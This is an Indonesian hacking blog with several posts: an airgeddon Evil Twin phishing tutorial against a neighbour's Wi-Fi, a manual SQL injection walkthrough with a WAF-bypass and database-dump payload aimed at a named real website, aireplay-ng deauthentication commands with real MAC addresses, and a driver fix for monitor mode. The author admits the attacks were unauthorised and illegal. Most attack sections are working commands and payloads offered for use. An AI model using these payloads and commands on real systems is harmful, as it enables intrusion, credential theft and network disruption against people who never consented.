Senin, 28 September 2020

Tutorial Hack Wi-Fi Tanpa Wordlist


      Halo guys, setelah kemarin gua bikin tutorial retas wifi menggunakan wordlist, sekarang gua mau share lagi cara retas wifi tanpa menggunakan wordlist. Apa aja yang diperlukan? sebuah Wireless Adapter bebas mau apa aja, dan yang pasti adalah kali linux nya xixixi. Langsung aja ke caranya:

1. Clone GitHub

Pada kali ini, Demon pakai tools airgeddon, dengan developernya visitorishere

root@localhost:~# git clone https://github.com/v1s1t0r1sh3r3/airgeddon
root@localhost:~# cd airgeddon  



2. Jalankan Script

Karena airgeddon menggunakan bahasa bash, kita jalankan dengan perintah:

:~/airgeddon# bash airgeddon.sh
  

NB: Bagi yang pertama kali install, mungkin ada beberapa dependencies yang missing, bagi yang mau ditanyakan cara install dependencies, silahkan tanya di kolom komentar

3. Select chipset

  

Karena gua disini wirless adapternya adalah TP-Link, jadi gua pilih nomer 2

4. Select tipe serangan


Nah, disini kita pakai tipe Evil Twin sebagai type serangan nya

5. Change Wireless Adapter mode -> Monitor




Kita ubah jadi monitor mode supaya bisa mendetect jaringan disekitar kita

6. Select type Captive Portal


Captive Portal adalah halaman web yang diakses dengan browser web yang ditampilkan kepada pengguna Wi-Fi atau jaringan kabel yang baru tersambung sebelum mereka diberikan akses yang lebih luas ke sumber daya jaringan. 

7. Monitoring Target


Monitoring berguna untuk mendeteksi wireless di sekitar kita, setelah monitoring, di tab airodump-ng tekan ctrl + c untuk stop monitoring.

8. Select Target



  
Disini gua contohin pake jaringan rumah gua dengan ESSID 'INDIRA", buat indira kalo baca ini sorry banget :v

9. Select DeAuth



Disini gua saranin pakai aireplay-ng supaya lebih agresive xixixi

NB: Kalo user belom deauth dengan menggunakan tools airgeddon, kalian bisa DeAuth sendiri dengan syarat menggunakan banyak windows (Jendela) karena tipe ketahanan client ke AP juga beda beda, tutorial? disini 

10. Setting Penyerangan

Setelah itu, akan ada 3 opsi, dari yang pertama:

1. DoS Pursuit Mode ~ N
2. Spoof your Mac Address ~ N
3. Do You Already Have A Captured.... ~ N

Type Value; Antara 10-100, gua saranin 90/99 supaya lebih efektif saat deauth



11.Sedang proses DeAuh CLient




Tunggu sampai berhasil

12. Setting Evil Twin

Capture File Generated Succesfully ~ Enter
Type The Path To Store ~ Enter
The type is valid, and you write the permissions ~ Enter


13. Select Language

Selanjutnya adalah pilih bahasa, saran gua pake bahasa english yaitu nomer 1, lalu enter.





dan klik enter lagi

14. Pembuatan Access Point 

Dan tunggu selama kurang lebih 10-15 detik untuk proses pembuatan nya :v


15. Pengecekan AP Evil Twin 


Dan AP tiruan sudah berhasil dibuat, selanjutnya kita tunggu user untuk memasukkan password

NB: AP Tiruan adalah yang memiliki tanda seru!

16. Mengecek Reaksi Saat Connect


Ini adalah tampilan web phising kita, apa bakal ke detect anti malware? sejauh yang saya gunakan sampe sekarang, ga pernah ke detect sama firewall dan AV

17. Mengecek password yang masuk


Ok password nya udah masuk ya lur, ini hanya untuk pembelajaran

Quotes untuk hari ini: hacking is illegal, but the method is art.

Kalo ada yang mau ditanyakan silahkan bertanya di kolom komentar xixixi

Rabu, 08 Juli 2020

Tutorial SQL Injection Manual Mudah

  

      Halo guys, sekarang gua mau share tentang SQL manual. Bagi yang ga tau SQL Injection itu apa, SQL Injection adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data (database) sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter karakter pelolos yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. Ok langsung aja ke teknik nya

1. Dorking dulu

      Nah bagi yang ga tau dork itu apa, google dork adalah fitur pencarian yang disediakan oleh google untuk mencari artikel yang berkaitan dengan query yang kita masukkan, nah dork yang umum adalah misalnya:

inurl: site.sch.id .php?id=
inurl: site.go.id php?id=
inurl: product.php?id=

Bagi yang ga tau cara dorking gimana :



Kalo udah tentuin dulu targetnya

Nah disini target gua seperti kemaren juga

https://mashailalqasr.com/eng/products.php?catid=1

Untuk mengecek nya, masukkan string ( ' ) dibelakangnya, Like this

https://mashailalqasr.com/eng/products.php?catid=1'



2. Order By

Terus kita cari jumlah kolomnya ada berapa dengan menambahkan order by dibelakangnya:

https://mashailalqasr.com/eng/products.php?catid=1' order by 1--+-

saat dilihat error, coba kita hapus ( ' ) dibelakang angka 1

https://mashailalqasr.com/eng/products.php?catid=1 order by 1--+-


Dan hasilnya mulus, kita cari jumlah kolom nya lagi sampe nemu error, caranya;

https://mashailalqasr.com/eng/products.php?catid=1 order by 1--+- ~ Mulus
https://mashailalqasr.com/eng/products.php?catid=1 order by 2--+- ~ Mulus
https://mashailalqasr.com/eng/products.php?catid=1 order by 3--+- ~ Mulus
(Gua skip aja)
https://mashailalqasr.com/eng/products.php?catid=1 order by 36--+- ~ Mulus
https://mashailalqasr.com/eng/products.php?catid=1 order by 37--+- ~ Nah ini Burik ini (error)

NB: kalo error di angka 40 dan angka 39 mulus, berarti jumlah kolom hanya sampai 39, kalo mau sekalian cek bisa di inject kolomnya atau ngga, langsung masukin aja order by 100 :v


Kolom 36 masih mulus, kita cek kolom 37


Nah ini burik namanya, langsung hantam aja!

3. Union Select

Caranya, tadi kan jumlah kolom hanya sampai 36, berarti kita masukin:

https://mashailalqasr.com/eng/products.php?catid=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+-

Kalo udah, nanti bakal ada error not acceptable blablabla by mod_security, nah itu adalah WAF nya, hal itu biasa terjadi pas lagi mau inject target :v cara menembusnya pakai command ini:

Pengganti union select:  /*!12345union*/+/*!12345select*/+

Jadinya kita masukin seperti Ini:

https://mashailalqasr.com/eng/products.php?catid=1/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+-

Result:


Nah, jangan lupa scroll ke bawah untuk liat angka togelnya, disitu angka togelnya adalah 5
Jadi yang kita pakai untuk ngintip basis data/database) nya terletak di angka 5. Langsung aja kita dump dengan menggunakan DIOS (Dump In One Shot)

DIOS:   /*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@)

Jadinya seperti ini:

https://mashailalqasr.com/eng/products.php?catid=1/*!12345union*/+/*!12345select*/+1,2,3,4, /*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+-

Nanti hasilnya seperti ini:


Untuk permisalan, gua mau dump, semisal gua mau dump tables banks nya :v



Ok, Sekian dulu kalo ada yang mau ditanyain silahkan di kolom komentar

Minggu, 05 Juli 2020

Teknik Penyerangan Terhadap Wi-Fi Dan Cara Menangkalnya #1

  
     

      Bro? lu tau wifi kan? iya wifi sebagai Access Point internet seseorang. Ternyata bisa dibuat down juga oleh kita, bagaimana caranya? dan bagaimana mencegahnya? simak berikut ini:

1. Apa saja keamanan Wi-Fi?

      Ada tiga protokol keamanan dalam jaringan WiFi, yaitu WEP (Wired Equivalent Privacy), WPA (Wi-Fi Protected Access), dan WPA2 (Wi-Fi Protected Access versi 2). Ada tiga aspek keamanan yang dapat diharapkan dari implementasi protokol keamanan, yaitu autentisitas (, integritas, dan kerahasiaan (confidentiality). Tapi tenang saja, itu semua bisa di tembus dengan beberapa persyaratan. Dan kalo persyaratannya sudah terpenuhi, siap siap "Tidak ada Wi-Fi yang aman" jangan lupa dibuat pansos juga ya, biar dibilang "Hekel plo, ampun stah" aowkwkwk:v

2. Persyaratan Supaya Berhasil

    Sebenarnya ada 5-7 persyaratan, tapi disini gua jelasin 3 persyaratan yang paling ber efek supaya teknik penyerangan Wi-Fi berhasil:

> Jarak

      Ya, yang pertama adalah jarak. Bukan jarak antara kita ya aowkwkw. Jarak yang gua maksud adalah jarak si peretas dengan AP (Access Point). AP disini yang gua maksud adalah sumber internet nya atau wifi nya sendiri

> Wireless Adapter

     Yang kedua adalah wireless Adapter. Disini gua pake TP-Link WN722N, usahakan cari yang range nya jauh, karena ini juga menentukan peluang berhasil atau ngga!. Kenapa saya milih TP-Link? karena cari yang model alpha / Atheros disini susah, kaya nyari cewek yang cuma chatan sama satu cowok :v

Ini TP-Link yang gua pake:









Bagi kalian yang TP-Link nya error, bisa baca disini 

> Prosesor minimal 3 / lebih

      Yang terakhir adalah prosesor dengan jumlah minimal 3, prosesor ini bisa disetting di virtual box dengan settings -> processor -> Pilih minimal 3 / lebih. Kita akan membutuhkan banyak tab terminal baru untuk melakukan serangan. ok langsung ke caranya

3. Melakukan serangan

A. Setting wireless adapter ke mode monitor

      Yang pertama harus kalian lakukan adalah memastikan Wireless Adapter dalam keadaan monitor, kalo tidak dalam keadaan monitor, ya ga bakal bisa nargetin lah :v

root@localhost:~# iwconfig wlan0 mode monitor
  
Karena interface gua adalah wlan0 makanya iwconfig wlan0, untuk mengecek nya ketik:

root@localhost:~# iwconfig

 

Setelah itu waktunya kita monitor, tapi sebelumnya jalankan airmon-ng dengan perintah:

B. Airmon-ng

root@localhost:~# airmon-ng start <interface anda> 
root@localhost:~# airmon-ng start wlan0


  
Interface nya sesuaikan dengan interface kalian sendiri.

C. Airodump-ng

Selanjutnya adalah airodump-ng, ya command ini untuk monitoring jaringan disekitar kita, dengan cara:

root@localhost:~# airodump-ng <interface kalian yang sudah dalam keadaan monitor>
root@localhost:~# airodump-ng wlan0  

Karena wlan0 saya sebelumnya sudah dalam keadaan monitor, sebenarnya tidak terlalu penting untuk menjalankan airmon-ng :v

D. Identifikasi dan tentukan target


Nah disini gua targetin dengan ESSID dengan nama "INDIRA" dia tetangga gua :v. ESSID adalah singkatan dari Service Set Identifier, fungsinya yaitu memberikan nama untuk wireless router maupun access point anda.
 
E. Menentukan Station Untuk Inject Client

Nah disini kalian harus menentukan client yang mau kalian track trace root nya. Dengan perintah:

root@localhost:~# airodump-ng wlan0 --bssid FC:A6:CD:82:EF:18 --channel 1 

Seperti gambar:

 
--bssid : bssid adalah alamat dari Access Point dengan ESSID "INDIRA" 
--channel : Channel ini adalah channel dari ESSID "INDIRA" dan ingat, channel ini BUKAN  yang di sebelah kiri atas, kalo salah ya ga bakal bisa, lalu kita ENTER.

 


Station : adalah alamat dari client (Yang terhubung dengan Access Point)
BSSID : adalah alamat dari Access Point nya, lanjut lur.

F. Aireplay-ng

Disini gua bakal pake aireplay untuk deauth client, dengan perintah;

root@localhost:~# aireplay-ng --deauth 0 -c <station atau alamat client nya> -a <bssid Acces Pointnya> <interface anda yang dalam keadaan monitor>

Atau lebih jelasnya gini:

root@localhost:~# aireplay-ng --deauth 0 -c 58:5F:F6:4D:45:E1 -a FC:A6:CD:82:EF:18 wlan0



Karena ada 2 client yang terhubung, biar makin greget kita trace juga dua duanya :v


Nah proses deauth nya udah berjalan, dan target akan marah marah dalam hati wkwkwk, bagi yang ga tau deauth itu apa

DeAuth = Dead Authentication yang berarti memaksa client untuk memutus jaringan terhadap Access Point tanpa persetujuan dari client dan ini cukup greget :v

FYI: 10:05:44  Sending 64 directed DeAuth (code 7). STMAC: [58:5F:F6:4D:45:E1] [ 0| 2 ACKs]

Dibelakang kan ada [ 0| 2 ACKs] kalo angka depannya udah berubah jadi 0 itu berarti target sudah tidak ada sinyal sama sekali, saya jamin itu semua.

Untuk mengecek benar atau tidaknya coba jalankan airodump-ng sambil menjalankan aireplay-ng, seperti gambar:


Dan bisa dilihat di angka 0 yang saya block, power = 0 xixixi, pastikan kalian sudah dapet izin untuk melakukan pentest jaringannya, jangan kaya gua om, illegal wkwkwk. Jangan ditiru :v karena gua pentest tanpa sepengetahuan si pemilik, dan satu lagi jangan lupa dibuat pansos, karena dengan pansos mastah akan mengenalmu :v


4. Melakukan pengamanan

Ini berdasarkan pengalaman Wi-Fi sodara gua di jakarta yang pernah gua test sebagai percobaan dan sudah diberi izin oleh sodara gua, berikut caranya menghindari agar Wi-FI tidak mudah di retas:

1. Gunakan password yang susah

Hal ini adalah wajib hukumnya, agar peretas tidak bisa meretas capture data yang telah didapatkan di tangan hacker, gunakan kombinasi simbol, huruf besar, huruf kecil, angka dsb. seperti: &O!(^#**!^1137#&()!&r^#* ~ ini permisalan doang ya !  

2. Aktifkan Network Encryption

Kalo gua cukup tidak terlalu pengaruh dengan enkripsi saat melakukan pentest. Tapi bagi yang pemula pasti kesulitan karena dulu saya juga seperti anda :v. Maksudnya Network Encryption itu apaan bos? seperti contoh WPA2 / WPA adalah network encryption dan dikombinasikan dengan password yang sulit

3. Buat lah pendek jangkauan WI-Fi anda  
  
Semakin pendek jangkauan Wi-Fi anda, semakin lama peretas akan meretas Wi-Fi anda, untuk mengrim frames dan Beacons diperlukan jarak yang dekat. Disetiap ada kelebihan pasti ada kekurangan :)

sekian dari gua DemonX, jika ada yang mau ditanyakan silahkan hubungi gua 

Kalo ada saran konten silahkan tulis di kolom komentar :v 

Rabu, 01 Juli 2020

Kenapa TP-Link WN722N error saat Monitor mode? Berikut mengatasinya

   
      Halo guys, back again bersama aing DemonX. Sekarang gua mau share ke kalian cara mengatasi Wireless USB Adapter TL-WN722N tidak bisa melakukan monitoring mode. Trouble nya seperti apa? Simak Lebih Lanjut.


1. Permasalahan

A. Tidak bisa monitor mode


Masalah yang pertama adalah tidak bisa monitor mode. Kalo ga bisa monitor mode, ya tidak bisa melakukan airodump-ng :v. Maka otomatis tidak bisa menjalankan tools yang lainnya, misal wifite, airgeddon, fluxion dll. kalo ga bisa monitor mode auto useless :v

B. Tidak bisa airodump-ng 


Yang ke 2 adalah tidak bisa melakukan airodump-ng, kalo sudah begini apa yang mau dilakuin? hahaha :v

C. Tidak bisa melakukan aireplay-ng


Aireplay-ng berfungsi untuk melakukan deauth (Memutus sambungan Client ke Access Point), kalo kita mau melakukan handshake snooper, maka harus memutus client (yang terhubung) dengan Acces Point (AP) atau hotspot nya (Sumber wifi), begitu juga dengan wifiphisher

D. Phy Null saat melakukan monitoring 


Ini lah core of the core dari permasalahan itu semua wkwkwk, yang harusnya phy berubah jadi phy0 atau phy1 tapi malah null (kosong)

2. pemecahan Masalah

FYI: Pastikan kalian masuk sebagai user root dengan perintah:

kali@kali:~$ sudo su

(lalu masukkan password kalian sendiri)
(nanti akan berubah menjadi)

root@namakalian:~# 

1. Pastikan kernel linux anda versi 5.6.0 (yang terbaru)

yang pertama kernel kalian harus versi terbaru cara mengeceknya:

root@localhost:~# uname -r

karena kalo pakai kernel 5.5.0 bisa saja tidak work, kalo mau mendapatkan versi 5.6.0 upgrade dan update kali kalian dengan cara perintah:

root@localhost;~# apt-get update
root@localhost:~# apt-get upgrade

Kalo kernel kalian tidak bisa di upgrade, coba untuk install ulang OS kali Linux kalian di Virtual Box     

2. :~# rmmod r8188eu.ko



Nah itu error karena saya udah hapus duluan tadi hehehe, kalo belom bakal mulus ga ada error apa", kalian hapus dulu file r8188eu.ko dengan perintah di atas  agar nanti bisa kita install dengan 8188eu terbaru 

3. echo "blacklist r8188eu.ko" > "/etc/modprobe.d/realtek.conf"

Nah kita blacklist r8188eu.ko supaya ga bikin error saat monitor mode, ingat ya itu disimpan di dalam folder /etc/modprobe.d/ dengan file bernama realtek.conf

4. :~# git clone https://github.com/aircrack-ng/rtl8188eus

Kalian install github nya dari link diatas lalu masuk ke directory nya dengan perintah

5. :~# cd rtl8188eus



Kalo sudah, kita lanjut lagi

6. :~/rtl8188eus# make

Make ini supaya yang dibutuhkan oleh driver kita tersedia di kali linux.

 
Karena saya udah make duluan, jadi langsung make [1]:leaving directory

7. :~rtl8188eus# make install

Nah ini berfungsi untuk installing ke dalam system kita (Pemasangan)


Nah nanti bakal keluar tulisan

install -p -m 644 8188eu.ko  /lib/modules/5.6.0-kali2-amd64/kernel/drivers/net/wireless/
/sbin/depmod -a 5.6.0-kali2-amd64

8. :~/rtl8188eus# cd

Lalu kembali ke akses root kalian dan ketik perintah ini:

9. :~# modprobe 8188eu

Untuk menjalankan dari perintah "make" yang tadi agar berjalan karena r8188eu.ko sudah diganti dengan 8188eu


10. :~# airmon-ng check kill

Untuk mengecek apakah sudah bisa digunakan untuk kill PID



11. cabut dan pasang kembali TL-WN722N

Ini dilakukan supaya me refresh drivers, lakukan jeda sekitar 10 detik.

12, :~# ip link set wlan0 down

Ini supaya mencegah PID yang sudah di kill muncul lagi

13. :~# iw dev wlan0 set type monitor

Atau bisa juga kalian ketik

:~# iwconfig wlan0 mode monitor

lalu kalian cek dengan perintah

14. :~# iwconfig
 



Nah nanti bakal berubah dari mode managed ke mode monitor

15. :~# airodump-ng wlan0

Nah terakhir kalian ketik perintah diatas dan hasilnya:


Ok sekian dulu tutorial error Wireless adapter TP Link nya :v


kalo ada yang mau request untuk materi selanjutnya tulis di kolom komentar ea :v

Highlited Post By DemonX

Intip Dunia IT secara Universal

       Hello guys ini postingan perdana Demon untuk blogspot, sekarang demon mau basa basi dulu seputar Hacking dan dunia IT. Saat ini kedu...